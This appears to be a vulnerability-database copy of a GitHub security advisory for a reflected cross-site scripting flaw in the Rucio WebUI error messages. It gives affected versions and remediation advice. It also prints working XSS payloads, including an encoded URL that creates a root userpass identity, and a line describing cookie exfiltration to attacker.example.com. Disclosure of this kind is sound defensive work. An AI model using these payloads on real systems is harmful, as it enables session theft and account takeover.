GHSA-H79M-5JJM-JM4Q

Vulnerability from github – Published: 2026-02-25 18:53 – Updated: 2026-02-25 18:53
VLAI?
Summary
Rucio WebUI has a Reflected Cross-site Scripting Vulnerability
Details

Summary

A reflected Cross-site Scripting vulnerability was located in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL.

Details

The WebUI error message renders ExceptionMessage (which can contain user-controlled input) as unencoded HTML. Server code that produces the message is in common.py - specifically error_headers -> _error_response -> generate_http_error_flask, which places ExceptionMessage into both response headers and the JSON body. The WebUI client then injects that text into the DOM using unsafe methods (examples in lib/rucio/web/ui/static/*.js such as rule.js, request_rule.js, list_rules.js) with jQuery.html(...) or equivalent, enabling reflected XSS when an attacker-controlled value is included in an error message (e.g. account, attribute, scope).

PoC

1) Reflected XSS via account parameter (browse or load URL in WebUI context):

https://127.0.0.1:8443/ui/account_rse_usage?account=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E

Server response (excerpt):

HTTP/1.1 500 INTERNAL SERVER ERROR
ExceptionClass: AccountNotFound
ExceptionMessage: Account <img src=x onerror=alert(document.cookie)> does not exist
Content-Type: application/octet-stream

{"ExceptionClass":"AccountNotFound","ExceptionMessage":"Account <img src=x onerror=alert(document.cookie)> does not exist"}

XSS payload triggering (Displaying session token) when browsing to crafted URL XSS payload triggering (Displaying session token) when browsing to crafted URL

When the WebUI inserts ExceptionMessage into the page with .html(...), the injected executes and displays the users' session tokens. Note that this is a PoC only, an attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e GET https://attacker.example.com/rucio/{BASE64_COOKIE}).

2) Reflected XSS via account key attribute creation error:

POST /proxy/accounts/pentest/attr/XSS HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Origin: https://127.0.0.1:8443
X-Rucio-Script: webui::-ui-account
{"key":"XSS","value":"<script>alert(document.cookie)</script>"}

XSS payload triggering (Displaying session token) on error when creating account key XSS payload triggering (Displaying session token) on error when creating account key

Server response (excerpt) contains ExceptionMessage with the raw <script> payload; the WebUI renders it unsafely and script executes. Note that this method is less impactful since it's not something that can be triggered with a URL alone, but is listed to show that this issue affects multiple locations.

Impact

Any authenticated WebUI user who follows a crafted link or triggers a request containing attacker-controlled input in a field that causes an error may execute arbitrary JavaScript in the WebUI origin. This vulnerability is more impactful due to the lack of protection of cookies (The Session token does not have HttpOnly attribute) and lack of Content Security Policy that would prevent thrid-party scripts from loading.

Attackers can steal session cookies/tokens or perform actions as the victim like creating a new UserPass identity with an attacker known password.

Example URL to Create UserPass for Root

https://localhost:8443/ui/account_rse_usage?account=%3Cimg%20src%3Dx%20onerror%3D(function()%7Bo%3D%7B%7D%3Bo.method%3D'PUT'%3Bo.credentials%3D'include'%3Bo.headers%3D%7B'X-Rucio-Username'%3A'attackeruser'%2C'X-Rucio-Password'%3A'AttackerPassword123'%2C'X-Rucio-Email'%3A'demo%40example.org'%2C'X-Rucio-Auth-Token'%3Atoken%7D%3Bfetch(String.fromCharCode(47)%2B'identities'%2BString.fromCharCode(47)%2B'root'%2BString.fromCharCode(47)%2B'userpass'%2Co)%7D)()%3E

Account Payload to Create UserPass

<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>

Creating identity for Root account via reflected XSS Creating identity for Root account via reflected XSS

All WebUI users are impacted.

Remediation / Mitigation

Change all client-side insertions of server-provided text from .html(...) to .text() or create text nodes / escape HTML before insertion. Example: replace $('#elem').html(msg) with $('#elem').empty().append($('<span>').text(msg)).

Additionally, consider adding a Content Security Policy (CSP) to mitigate external script execution and set the HTTPOnly flag for session cookies. Also, the API token should not be set in a JavaScript variable as it can be accessed by an attacker even with the HTTPOnly flag set on the session cookie.

Note that many pages were found setting the API token as token in an authenticated response like var token = "root-root-webui-...:" (See /ui/list_accounts for example)

References:

  • Server functions: common.py (error_headers, _error_response, generate_http_error_flask)
  • Example client files to fix: lib/rucio/web/ui/static/rule.js, lib/rucio/web/ui/static/request_rule.js, list_rules.js
  • OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html
Severity ?
8.1 (High)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rucio-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "35.8.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rucio-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "36.0.0rc1"
            },
            {
              "fixed": "38.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "rucio-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "39.0.0rc1"
            },
            {
              "fixed": "39.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25136"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1004",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-25T18:53:29Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nA reflected Cross-site Scripting vulnerability was located in the rendering of the ExceptionMessage of the WebUI 500 error which could allow attackers to steal login session tokens of users who navigate to a specially crafted URL.\n\n#### Details\nThe WebUI error message renders `ExceptionMessage` (which can contain user-controlled input) as unencoded HTML. Server code that produces the message is in `common.py` - specifically `error_headers -\u003e _error_response -\u003e generate_http_error_flask`, which places `ExceptionMessage` into both response headers and the JSON body. The WebUI client then injects that text into the DOM using unsafe methods (examples in `lib/rucio/web/ui/static/*.js` such as `rule.js`, `request_rule.js`, `list_rules.js`) with `jQuery.html(...)` or equivalent, enabling reflected XSS when an attacker-controlled value is included in an error message (e.g. account, attribute, scope).\n\n### PoC\n1) Reflected XSS via account parameter (browse or load URL in WebUI context):\n```text\nhttps://127.0.0.1:8443/ui/account_rse_usage?account=%3Cimg%20src=x%20onerror=alert(document.cookie)%3E\n```\nServer response (excerpt):\n```http\nHTTP/1.1 500 INTERNAL SERVER ERROR\nExceptionClass: AccountNotFound\nExceptionMessage: Account \u003cimg src=x onerror=alert(document.cookie)\u003e does not exist\nContent-Type: application/octet-stream\n\n{\"ExceptionClass\":\"AccountNotFound\",\"ExceptionMessage\":\"Account \u003cimg src=x onerror=alert(document.cookie)\u003e does not exist\"}\n```\n\n**XSS payload triggering (Displaying session token) when browsing to crafted URL**\n\u003cimg width=\"1210\" height=\"510\" alt=\"XSS payload triggering (Displaying session token) when browsing to crafted URL\" src=\"https://github.com/user-attachments/assets/989a0aed-628d-4f1c-bbfb-de434dab8af6\" /\u003e\n\nWhen the WebUI inserts `ExceptionMessage` into the page with `.html(...)`, the injected \u003cimg onerror=...\u003e executes and displays the users\u0027 session tokens. Note that this is a PoC only, an attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\n2) Reflected XSS via account key attribute creation error:\n```http\nPOST /proxy/accounts/pentest/attr/XSS HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nOrigin: https://127.0.0.1:8443\nX-Rucio-Script: webui::-ui-account\n{\"key\":\"XSS\",\"value\":\"\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\"}\n```\n\n**XSS payload triggering (Displaying session token) on error when creating account key**\n\u003cimg width=\"1322\" height=\"593\" alt=\"XSS payload triggering (Displaying session token) on error when creating account key\" src=\"https://github.com/user-attachments/assets/151cb0ad-e4f0-498e-954e-be3455ca8a72\" /\u003e\n\nServer response (excerpt) contains `ExceptionMessage` with the raw `\u003cscript\u003e` payload; the WebUI renders it unsafely and script executes. Note that this method is less impactful since it\u0027s not something that can be triggered with a URL alone, but is listed to show that this issue affects multiple locations.\n\n### Impact\nAny authenticated WebUI user who follows a crafted link or triggers a request containing attacker-controlled input in a field that causes an error may execute arbitrary JavaScript in the WebUI origin. This vulnerability is more impactful due to the lack of protection of cookies (The Session token does not have HttpOnly attribute) and lack of Content Security Policy that would prevent thrid-party scripts from loading.\n\nAttackers can steal session cookies/tokens or perform actions as the victim like creating a new UserPass identity with an attacker known password. \n\n**Example URL to Create UserPass for Root**\n```\nhttps://localhost:8443/ui/account_rse_usage?account=%3Cimg%20src%3Dx%20onerror%3D(function()%7Bo%3D%7B%7D%3Bo.method%3D\u0027PUT\u0027%3Bo.credentials%3D\u0027include\u0027%3Bo.headers%3D%7B\u0027X-Rucio-Username\u0027%3A\u0027attackeruser\u0027%2C\u0027X-Rucio-Password\u0027%3A\u0027AttackerPassword123\u0027%2C\u0027X-Rucio-Email\u0027%3A\u0027demo%40example.org\u0027%2C\u0027X-Rucio-Auth-Token\u0027%3Atoken%7D%3Bfetch(String.fromCharCode(47)%2B\u0027identities\u0027%2BString.fromCharCode(47)%2B\u0027root\u0027%2BString.fromCharCode(47)%2B\u0027userpass\u0027%2Co)%7D)()%3E\n```\n\n**Account Payload to Create UserPass**\n```html\n\u003cimg src=x onerror=(function(){o={};o.method=\u0027PUT\u0027;o.credentials=\u0027include\u0027;o.headers={\u0027X-Rucio-Username\u0027:\u0027attackeruser\u0027,\u0027X-Rucio-Password\u0027:\u0027AttackerPassword123\u0027,\u0027X-Rucio-Email\u0027:\u0027demo@example.org\u0027,\u0027X-Rucio-Auth-Token\u0027:token};fetch(String.fromCharCode(47)+\u0027identities\u0027+String.fromCharCode(47)+\u0027root\u0027+String.fromCharCode(47)+\u0027userpass\u0027,o)})()\u003e\n```\n\n**Creating identity for Root account via reflected XSS**\n\u003cimg width=\"1558\" height=\"957\" alt=\"Creating identity for Root account via reflected XSS\" src=\"https://github.com/user-attachments/assets/539bfff4-70f3-42c5-b83a-10b5f85d6d44\" /\u003e\n\nAll WebUI users are impacted.\n\n### Remediation / Mitigation\nChange all client-side insertions of server-provided text from `.html(...)` to `.text()` or create text nodes / escape HTML before insertion. Example: replace `$(\u0027#elem\u0027).html(msg)` with `$(\u0027#elem\u0027).empty().append($(\u0027\u003cspan\u003e\u0027).text(msg))`.\n\nAdditionally, consider adding a Content Security Policy (CSP) to mitigate external script execution and set the HTTPOnly flag for session cookies. Also, the API token should not be set in a JavaScript variable as it can be accessed by an attacker even with the HTTPOnly flag set on the session cookie.\n\n\u003e Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n#### References:\n- Server functions: `common.py` (`error_headers`, `_error_response, generate_http_error_flask`)\n- Example client files to fix: `lib/rucio/web/ui/static/rule.js`, `lib/rucio/web/ui/static/request_rule.js, list_rules.js`\n- OWASP XSS Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html",
  "id": "GHSA-h79m-5jjm-jm4q",
  "modified": "2026-02-25T18:53:29Z",
  "published": "2026-02-25T18:53:29Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/security/advisories/GHSA-h79m-5jjm-jm4q"
    },
    {
      "type": "WEB",
      "url": "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/rucio/rucio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/releases/tag/35.8.3"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/releases/tag/38.5.4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rucio/rucio/releases/tag/39.3.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Rucio WebUI has a Reflected Cross-site Scripting Vulnerability"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.